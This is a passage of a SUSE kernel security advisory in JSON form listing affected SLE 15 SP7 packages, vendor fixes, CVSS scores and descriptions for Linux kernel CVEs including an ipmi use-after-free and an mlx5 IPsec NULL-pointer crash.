"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-40181"
},
{
"cve": "CVE-2025-40202",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40202"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipmi: Rework user message limit handling\n\nThe limit on the number of user messages had a number of issues,\nimproper counting in some cases and a use after free.\n\nRestructure how this is all done to handle more in the receive message\nallocation routine, so all refcouting and user message limit counts\nare done in that routine. It\u0027s a lot cleaner and safer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40202",
"url": "https://www.suse.com/security/cve/CVE-2025-40202"
},
{
"category": "external",
"summary": "SUSE Bug 1253451 for CVE-2025-40202",
"url": "https://bugzilla.suse.com/1253451"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-40202"
},
{
"cve": "CVE-2025-40238",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40238"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Fix IPsec cleanup over MPV device\n\nWhen we do mlx5e_detach_netdev() we eventually disable blocking events\nnotifier, among those events are IPsec MPV events from IB to core.\n\nSo before disabling those blocking events, make sure to also unregister\nthe devcom device and mark all this device operations as complete,\nin order to prevent the other device from using invalid netdev\nduring future devcom events which could cause the trace below.\n\nBUG: kernel NULL pointer dereference, address: 0000000000000010\nPGD 146427067 P4D 146427067 PUD 146488067 PMD 0\nOops: Oops: 0000 [#1] SMP\nCPU: 1 UID: 0 PID: 7735 Comm: devlink Tainted: GW 6.12.0-rc6_for_upstream_min_debug_2024_11_08_00_46 #1\nTainted: [W]=WARN\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\nRIP: 0010:mlx5_devcom_comp_set_ready+0x5/0x40 [mlx5_core]\nCode: 00 01 48 83 05 23 32 1e 00 01 41 b8 ed ff ff ff e9 60 ff ff ff 48 83 05 00 32 1e 00 01 eb e3 66 0f 1f 44 00 00 0f 1f 44 00 00 \u003c48\u003e 8b 47 10 48 83 05 5f 32 1e 00 01 48 8b 50 40 48 85 d2 74 05 40\nRSP: 0018:ffff88811a5c35f8 EFLAGS: 00010206\nRAX: ffff888106e8ab80 RBX: ffff888107d7e200 RCX: ffff88810d6f0a00\nRDX: ffff88810d6f0a00 RSI: 0000000000000001 RDI: 0000000000000000\nRBP: ffff88811a17e620 R08: 0000000000000040 R09: 0000000000000000\nR10: ffff88811a5c3618 R11: 0000000de85d51bd R12: ffff88811a17e600\nR13: ffff88810d6f0a00 R14: 0000000000000000 R15: ffff8881034bda80\nFS: 00007f27bdf89180(0000) GS:ffff88852c880000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000010 CR3: 000000010f159005 CR4: 0000000000372eb0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n ? __die+0x20/0x60\n ? page_fault_oops+0x150/0x3e0\n ? exc_page_fault+0x74/0x130\n ? asm_exc_page_fault+0x22/0x30\n ? mlx5_devcom_comp_set_ready+0x5/0x40 [mlx5_core]\n mlx5e_devcom_event_mpv+0x42/0x60 [mlx5_core]\n mlx5_devcom_send_event+0x8c/0x170 [mlx5_core]\n blocking_event+0x17b/0x230 [mlx5_core]\n notifier_call_chain+0x35/0xa0\n blocking_notifier_call_chain+0x3d/0x60\n mlx5_blocking_notifier_call_chain+0x22/0x30 [mlx5_core]\n mlx5_core_mp_event_replay+0x12/0x20 [mlx5_core]\n mlx5_ib_bind_slave_port+0x228/0x2c0 [mlx5_ib]\n mlx5_ib_stage_init_init+0x664/0x9d0 [mlx5_ib]\n ? idr_alloc_cyclic+0x50/0xb0\n ? __kmalloc_cache_noprof+0x167/0x340\n ? __kmalloc_noprof+0x1a7/0x430\n __mlx5_ib_add+0x34/0xd0 [mlx5_ib]\n mlx5r_probe+0xe9/0x310 [mlx5_ib]\n ? kernfs_add_one+0x107/0x150\n ? __mlx5_ib_add+0xd0/0xd0 [mlx5_ib]\n auxiliary_bus_probe+0x3e/0x90\n really_probe+0xc5/0x3a0\n ? driver_probe_device+0x90/0x90\n __driver_probe_device+0x80/0x160\n driver_probe_device+0x1e/0x90\n __device_attach_driver+0x7d/0x100\n bus_for_each_drv+0x80/0xd0\n __device_attach+0xbc/0x1f0\n bus_probe_device+0x86/0xa0\n device_add+0x62d/0x830\n __auxiliary_device_add+0x3b/0xa0\n ? auxiliary_device_init+0x41/0x90\n add_adev+0xd1/0x150 [mlx5_core]\n mlx5_rescan_drivers_locked+0x21c/0x300 [mlx5_core]\n esw_mode_change+0x6c/0xc0 [mlx5_core]\n mlx5_devlink_eswitch_mode_set+0x21e/0x640 [mlx5_core]\n devlink_nl_eswitch_set_doit+0x60/0xe0\n genl_family_rcv_msg_doit+0xd0/0x120\n genl_rcv_msg+0x180/0x2b0\n ? devlink_get_from_attrs_lock+0x170/0x170\n ? devlink_nl_eswitch_get_doit+0x290/0x290\n ? devlink_nl_pre_doit_port_optional+0x50/0x50\n ? genl_family_rcv_msg_dumpit+0xf0/0xf0\n netlink_rcv_skb+0x54/0x100\n genl_rcv+0x24/0x40\n netlink_unicast+0x1fc/0x2d0\n netlink_sendmsg+0x1e4/0x410\n __sock_sendmsg+0x38/0x60\n ? sockfd_lookup_light+0x12/0x60\n __sys_sendto+0x105/0x160\n ? __sys_recvmsg+0x4e/0x90\n __x64_sys_sendto+0x20/0x30\n do_syscall_64+0x4c/0x100\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\nRIP: 0033:0x7f27bc91b13a\nCode: bb 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 8b 05 fa 96 2c 00 45 89 c9 4c 63 d1 48 63 ff 85 c0 75 15 b8 2c 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
